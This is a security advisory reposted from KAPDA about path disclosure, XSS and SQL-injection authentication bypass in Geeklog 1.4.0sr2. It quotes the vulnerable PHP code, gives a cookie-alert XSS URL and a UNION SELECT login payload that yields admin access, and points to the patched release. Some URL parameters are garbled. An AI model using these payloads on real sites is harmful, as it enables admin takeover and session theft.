SecurityReason - geeklog multiple vulnerabilities

Advisory Text :

KAPDA New advisory

Vendor: http://www.geeklog.net
Bugs: Path Disclosure, XSS, SQL Injection
(Authentication bypass)

Vulnerable Version: geeklog-1.4.0sr2(prior versions
also may be affected)
Exploitation: Remote with browser

Description:
--------------------
geeklog is a freely available PHP-based web content
management system that uses a MySQL database.
Vulnerabilities:
--------------------
-->>Path Disclosure<<--
Reason: direct access to special files that generates
php error with installation path information.
Several files are vulnerable in this case.
Example:
http://example.com/geeklog/layout/professional/functions.php
http://example.com/geeklog/getimage.php?mode=showâ=dd

-->>XSS<<--
Reason: the script doesn't properly validate user
supplied input in getimage.php that result in xss
vulnerability

Example:
http://example.com/geeklog/getimage.php?mode=showâ=./<IMG%20SRC
=JaV
aScRiPt:alert(document.cookie)>

Code Snippets:
/getimage.php line#100-103

$display = COM_errorLog('File, ' .
$downloader->getPath() . $image . ', was not found in
getimage.php');

if ($mode == 'show') {
echo COM_siteHeader ('menu') . $display .
COM_siteFooter ();

-->>SQL Injection (Authentication bypass)<<--
Reason: again the script doesn't properly validate
user supplied input in /admin/auth.inc.php that may
result in Authentication bypass using sql injection to
gain admin privileges.

Code Snippets:
/admin/auth.inc.php line#44-45

if (!empty ($_POST['loginname']) && !empty
($_POST['passwd'])) {
$status = SEC_authenticate ($_POST['loginname'],
$_POST['passwd'], $uid);

../system/lib-security.php line#697-732

function SEC_authenticate($username, $password, &$uid)
{
global $_TABLES, $LANG01, $_CONF;

$result = DB_query( "SELECT status, passwd, email,
uid FROM {$_TABLES['users']} WHERE
username='$username' AND ((remoteservice is null) or
(remoteservice = ''))" );
$tmp = mysql_errno();
$nrows = DB_numRows( $result );

if(( $tmp == 0 ) && ( $nrows == 1 ))
{
$U = DB_fetchArray( $result );
$uid = $U['uid'];
if ($U['status'] == USER_ACCOUNT_DISABLED)
{
return USER_ACCOUNT_DISABLED; // banned,
jump to here to save an md5 calc.
} elseif ($U['passwd'] != md5( $password )) {
return -1; // failed login
} elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_APPROVAL) {
//awaiting approval, jump to msg.
echo COM_refresh($_CONF['site_url'] .
'/users.php?msg=70');
exit;
} elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_ACTIVATION) {
// Awaiting user activation, activate:

DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$use
rname);
return USER_ACCOUNT_ACTIVE;
} else {
return $U['status']; // just return their
status
}
}
else
{
$tmp = $LANG01[32] . ": '" . $username . "'";
COM_errorLog( $tmp, 1 );
return -1;
}
}

as you see there is no input validation here so when
magic_quotes_gpc=off you can bypass login
Authentication.

Example:
/admin/moderation.php POST data:
loginname:
me' union select
3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from
gl_users where username='Admin
passwd:
22222

Solution:
--------------------
Version geeklog-1.4.0sr3 is available now.
http://www.geeklog.net/article.php/geeklog-1.4.0sr3

Original Advisory:
--------------------
http://kapda.ir/advisory-336.html

Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]